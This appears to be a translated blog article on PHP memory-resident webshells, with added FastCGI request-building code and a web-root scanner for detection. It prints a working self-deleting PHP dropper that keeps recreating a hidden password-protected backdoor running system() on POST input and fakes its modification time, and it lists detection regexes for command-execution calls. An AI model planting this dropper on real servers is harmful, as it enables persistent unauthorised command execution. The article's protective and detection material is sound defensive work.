PHP memory horse
2022-07-28 15:01:00 【Jun moshang】
Basic concepts
A memory-resident Trojan (a "memory horse", sometimes called an "immortal horse") is a backdoor that keeps itself alive in memory: typically it deletes its own file from disk and survives as a hidden process or a looping script. Memory horses are a form of fileless attack, so fileless attacks need a short introduction first. Fileless attacks are effective at evading traditional, file-based security software: the payload is loaded and executed remotely in system memory, resides in the registry, or abuses commonly available whitelisted tools such as PowerShell, Windows Management Instrumentation (WMI) and PsExec. The technique gives the attacker access to the system and enables follow-on malicious activity. By manipulating exploits, legitimate tools, macros and scripts, attackers can disrupt systems, escalate privileges or spread malicious code across the network. Because a fileless threat leaves little trace on disk after execution, it is hard to detect and remove.
This article only covers PHP memory horses.
A PHP memory horse takes advantage of the way PHP scripts are parsed and executed: it uses PHP's runtime file functions to write or load malicious code dynamically, then calls PHP's external command execution interface (system(), exec() and similar functions) to run attacker-supplied commands.
Classification

① When PHP-FPM is enabled, requests reach it over the FastCGI protocol (FastCGI is the data exchange protocol between the web server or middleware and the PHP backend). If PHP-FPM is reachable from outside (for example, listening on 0.0.0.0:9000 without a `listen.allowed_clients` restriction), anyone can speak FastCGI to it directly and ask it to execute "any file" it can read, because the script to run is simply the SCRIPT_FILENAME parameter of the request.
② A memory-resident webshell usually deletes its own PHP file as soon as it starts executing, and then keeps running inside the PHP worker process.
<?php
ignore_user_abort(true);   // keep running after the client disconnects
set_time_limit(0);         // no execution time limit
unlink(__FILE__);          // delete the dropper itself from disk
$file = '/var/www/dvwa/.ski12.php';
$code = '<?php if(md5($_POST["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8"){@system($_POST["a"]);}?>';
while (1) {
    file_put_contents($file, $code);   // re-create the hidden backdoor every iteration
    // stomp the modification time; use the same absolute path as $file
    // (the original passed a relative ".ski12.php", which only works if the
    // worker's current directory happens to be /var/www/dvwa)
    system('touch -m -d "2018-12-01 09:10:12" ' . escapeshellarg($file));
    usleep(5000);
}
?>
ignore_user_abort() sets whether the script stops when the client disconnects. Setting it to true ignores the disconnect, so the script keeps executing even after the client has gone away.
set_time_limit() sets the maximum execution time of the script. Setting it to 0 removes the time limit.
unlink(__FILE__) deletes the file itself, so that the dropper leaves nothing on disk.
Every iteration of the while loop sleeps for usleep(5000) (5 ms) and then rewrites the backdoor file. The system() call in the middle changes the file's modification time so that a check such as `find -name '*.php' -mmin -10`, which lists PHP files modified or created in the last 10 minutes, will not show it. This step is optional and not necessarily effective: `touch -m` only rewrites mtime, while the inode change time (ctime) is updated by the kernel on every write and cannot be set with touch, so `find -cmin -10` still finds a file that is being rewritten every few milliseconds.
Finally, the generated hidden backdoor checks the MD5 of the POST parameter pass before running the command in the POST parameter a; this is to stop other people from using the backdoor.
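Back to item ① above: the reason an exposed PHP-FPM is dangerous is that the file to execute is just a parameter in the FastCGI request. The following Python is an added example (not code from the original article) that builds such a request byte for byte and parses it back, so you can see where SCRIPT_FILENAME travels. It opens no socket; the path /var/www/html/index.php and the parameter set are assumptions for illustration, and bodies larger than one 64 KiB record are not split.

```python
import struct

# FastCGI constants from the FastCGI specification
FCGI_VERSION_1 = 1
FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 4, 5
FCGI_RESPONDER = 1


def _record(rtype, req_id, content=b""):
    """One FastCGI record: 8-byte header, content, zero padding to 8 bytes."""
    pad = (8 - len(content) % 8) % 8
    header = struct.pack(">BBHHBx", FCGI_VERSION_1, rtype, req_id, len(content), pad)
    return header + content + b"\x00" * pad


def _nv_len(n):
    """Name/value length: 1 byte below 128, else 4 bytes with the high bit set."""
    return bytes([n]) if n < 128 else struct.pack(">I", n | 0x80000000)


def encode_params(params):
    out = b""
    for k, v in params.items():
        kb, vb = k.encode(), v.encode()
        out += _nv_len(len(kb)) + _nv_len(len(vb)) + kb + vb
    return out


def decode_params(content):
    params, off = {}, 0
    while off < len(content):
        lens = []
        for _ in range(2):
            if content[off] < 128:
                lens.append(content[off])
                off += 1
            else:
                lens.append(struct.unpack(">I", content[off:off + 4])[0] & 0x7FFFFFFF)
                off += 4
        klen, vlen = lens
        key = content[off:off + klen]
        off += klen
        val = content[off:off + vlen]
        off += vlen
        params[key.decode()] = val.decode()
    return params


def build_request(script_filename, extra=None, req_id=1, stdin=b""):
    """Bytes a client sends to PHP-FPM. SCRIPT_FILENAME is the file PHP-FPM will
    execute; on an exposed FPM socket that value is chosen by whoever connects."""
    params = {
        "GATEWAY_INTERFACE": "FastCGI/1.0",
        "REQUEST_METHOD": "GET",
        "SCRIPT_FILENAME": script_filename,          # assumed path, see lead-in
        "SCRIPT_NAME": "/" + script_filename.rsplit("/", 1)[-1],
        "SERVER_SOFTWARE": "example",
    }
    params.update(extra or {})
    begin = struct.pack(">HB5x", FCGI_RESPONDER, 0)   # role=responder, flags=0
    return (_record(FCGI_BEGIN_REQUEST, req_id, begin)
            + _record(FCGI_PARAMS, req_id, encode_params(params))
            + _record(FCGI_PARAMS, req_id)            # empty PARAMS record ends the params
            + _record(FCGI_STDIN, req_id, stdin)
            + _record(FCGI_STDIN, req_id))            # empty STDIN record ends the body


def parse_records(data):
    """Split a FastCGI byte stream back into (type, request_id, content) tuples."""
    records, off = [], 0
    while off + 8 <= len(data):
        _ver, rtype, req_id, clen, pad = struct.unpack(">BBHHBx", data[off:off + 8])
        records.append((rtype, req_id, data[off + 8:off + 8 + clen]))
        off += 8 + clen + pad
    return records


def script_requested(data):
    """What traffic inspection in front of PHP-FPM would extract: the
    SCRIPT_FILENAME in the first non-empty PARAMS record, or None."""
    for rtype, _rid, content in parse_records(data):
        if rtype == FCGI_PARAMS and content:
            return decode_params(content).get("SCRIPT_FILENAME")
    return None


if __name__ == "__main__":
    req = build_request("/var/www/html/index.php")
    print(len(req), "bytes; PHP-FPM would execute:", script_requested(req))
```

Nothing in the protocol authenticates the client or restricts SCRIPT_FILENAME, which is why the fix is on the listener side: bind PHP-FPM to 127.0.0.1 or a Unix socket, or set `listen.allowed_clients`, rather than trying to filter requests.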
Protection principle
Monitor the PHP execution process (what the PHP-FPM workers do, file writes into the web root, calls to command execution functions) and correlate these sensitive behaviours with each other to identify this kind of attack.
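One concrete correlation a defender can run on the web root, as an added example that is not part of the original article: the backdoor above is a hidden dotfile, contains a command execution call fed from a request parameter, and has an mtime stomped far into the past while its ctime is fresh (every rewrite in the loop bumps ctime). The script below flags files showing these indicators. The web root it scans is a constructed temporary directory with one benign index.php and one copy of the article's .ski12.php whose mtime is set back to 2018 the same way `touch -m -d` does; the rule set and the one-hour gap threshold are assumptions, not an exhaustive detector.

```python
import os
import re
import tempfile
import time

# Constructed content rules for the behaviours described in the article
CONTENT_RULES = {
    "cmd-exec-from-request": re.compile(
        rb"\b(system|exec|shell_exec|passthru|popen)\s*\(\s*@?\$_(POST|GET|REQUEST|COOKIE)\b"),
    "self-delete": re.compile(rb"\bunlink\s*\(\s*__FILE__\s*\)"),
    "detach-from-client": re.compile(rb"\bignore_user_abort\s*\(\s*true\s*\)"),
}


def timestomp_gap_seconds(path):
    """ctime minus mtime. `touch -m -d` rewrites mtime only; the kernel sets
    ctime on every write, so a file rewritten every 5 ms shows a large gap."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime


def scan_file(path, min_gap=3600):
    """Return the list of indicators found for one PHP file (empty if clean)."""
    findings = []
    if os.path.basename(path).startswith("."):
        findings.append("hidden-dotfile")
    gap = timestomp_gap_seconds(path)
    if gap > min_gap:
        findings.append("ctime-newer-than-mtime-by-%ds" % int(gap))
    with open(path, "rb") as f:
        body = f.read()
    for label, rule in CONTENT_RULES.items():
        if rule.search(body):
            findings.append(label)
    return findings


def scan_webroot(root, min_gap=3600):
    """Map of relative path -> indicators for every .php file with at least one hit."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full, min_gap)
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report


def build_demo_webroot():
    """Constructed sample web root: a benign index.php plus the article's
    dropped backdoor with its mtime stomped back to 2018 (ctime stays now)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    with open(os.path.join(root, "index.php"), "wb") as f:
        f.write(b"<?php echo 'hello'; ?>")
    dropped = os.path.join(root, ".ski12.php")
    with open(dropped, "wb") as f:
        f.write(b'<?php if(md5($_POST["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8")'
                b'{@system($_POST["a"]);}?>')
    # same effect as: touch -m -d "2018-12-01 09:10:12" .ski12.php
    old = time.mktime((2018, 12, 1, 9, 10, 12, 0, 0, -1))
    os.utime(dropped, (old, old))
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_webroot(build_demo_webroot()).items()):
        print(rel, "->", ", ".join(hits))
```

The ctime/mtime gap is the check that the `touch -m` trick cannot defeat; on its own it also fires on legitimately restored backups, which is why it is combined with the content and filename indicators rather than used alone. The dropper itself is gone from disk after unlink(__FILE__), so on a live system this file scan should be paired with process-level monitoring of the PHP-FPM workers.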